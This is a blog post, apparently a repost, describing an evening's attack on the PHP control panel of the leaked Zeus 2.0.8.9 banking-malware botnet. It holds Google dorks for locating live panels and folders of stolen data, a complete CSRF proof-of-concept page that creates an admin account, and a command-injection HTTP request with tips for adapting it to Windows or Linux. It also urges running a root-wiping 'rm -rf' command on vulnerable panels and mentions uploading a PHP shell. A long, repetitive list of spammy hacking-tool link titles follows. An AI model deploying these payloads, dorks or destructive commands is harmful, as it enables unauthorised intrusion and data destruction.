sabato 27 gennaio 2024

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Related news
  1. Hacker Tools Apk
  2. Kik Hack Tools
  3. Hack Tools Download
  4. Black Hat Hacker Tools
  5. Pentest Tools For Android
  6. Game Hacking
  7. Hacking Tools For Games
  8. Nsa Hack Tools Download
  9. Pentest Tools Apk
  10. Best Pentesting Tools 2018
  11. Pentest Tools For Mac
  12. Android Hack Tools Github
  13. Hacker Tools For Pc
  14. Free Pentest Tools For Windows
  15. Hacking Tools Windows
  16. Pentest Tools Bluekeep
  17. Hacking Tools For Windows Free Download
  18. Hackrf Tools
  19. Beginner Hacker Tools
  20. Pentest Tools Framework
  21. Hack Tools Github
  22. Hacking Tools 2020
  23. Hacker Tools Apk
  24. Pentest Tools Find Subdomains
  25. Hacking Tools For Mac
  26. Beginner Hacker Tools
  27. Hacking Apps
  28. Hacking Tools For Beginners
  29. Hack Tools
  30. Hacker Tools Free
  31. Pentest Tools Website Vulnerability
  32. Hacker Tools Apk Download
  33. Pentest Tools Tcp Port Scanner
  34. Hack Tools
  35. Free Pentest Tools For Windows
  36. Pentest Tools Framework
  37. Hacker Tools For Windows
  38. Hacker Security Tools
  39. Hacker Tools Hardware
  40. What Are Hacking Tools
  41. Hacker Security Tools
  42. Pentest Tools Review
  43. Hacker Tools 2019
  44. Hack Tools Github
  45. Hackers Toolbox
  46. Pentest Box Tools Download
  47. Hacking Apps
  48. Best Hacking Tools 2020
  49. Hacker Tools
  50. Hack Tools Download
  51. Free Pentest Tools For Windows
  52. How To Hack
  53. Hacking Tools Pc
  54. Hack Tool Apk
  55. New Hacker Tools
  56. Hack Tools For Mac
  57. Physical Pentest Tools
  58. Hacker Tools For Mac
  59. Hacker Tool Kit
  60. Pentest Box Tools Download
  61. How To Hack
  62. Pentest Tools For Android
  63. Easy Hack Tools
  64. Ethical Hacker Tools
  65. Hacking Tools For Windows 7
  66. Hacking Tools For Pc
  67. Hacker Tools For Pc
  68. Pentest Tools Find Subdomains
  69. Hacker Search Tools
  70. How To Install Pentest Tools In Ubuntu
  71. Pentest Tools Framework
  72. Pentest Tools Framework
  73. Pentest Tools Website
  74. Pentest Tools Linux
  75. Hacking Tools For Mac
  76. What Is Hacking Tools
  77. Pentest Tools Kali Linux
  78. Free Pentest Tools For Windows
  79. Best Hacking Tools 2019
  80. Hacker Tools Software
  81. Hacking Tools Usb
  82. Best Hacking Tools 2020
  83. Pentest Automation Tools
  84. Hack Tools 2019
  85. Growth Hacker Tools
  86. Pentest Recon Tools
  87. Hacker Tools 2020
  88. Hacker Tools For Windows
  89. Hacking App
  90. Hacking Tools And Software
  91. Hacker Tools For Mac
  92. Hacking Tools Free Download
  93. Hacker Security Tools
  94. Hacking Tools Software
  95. Hacker Tools Hardware
  96. Usb Pentest Tools
  97. Pentest Tools Bluekeep
  98. Hacking Tools For Windows Free Download
  99. Hacker Security Tools
  100. Pentest Tools Bluekeep
  101. Nsa Hack Tools Download
  102. Install Pentest Tools Ubuntu
  103. Tools 4 Hack
  104. Kik Hack Tools
  105. Pentest Tools List
  106. Ethical Hacker Tools
  107. Hacking Tools For Kali Linux
  108. Hack Tools Download
  109. What Is Hacking Tools
  110. Pentest Tools Alternative
  111. Hacker Tools Apk Download
  112. Hacker Techniques Tools And Incident Handling
  113. Hack Tools For Windows
  114. Pentest Tools Online

Nessun commento:

Posta un commento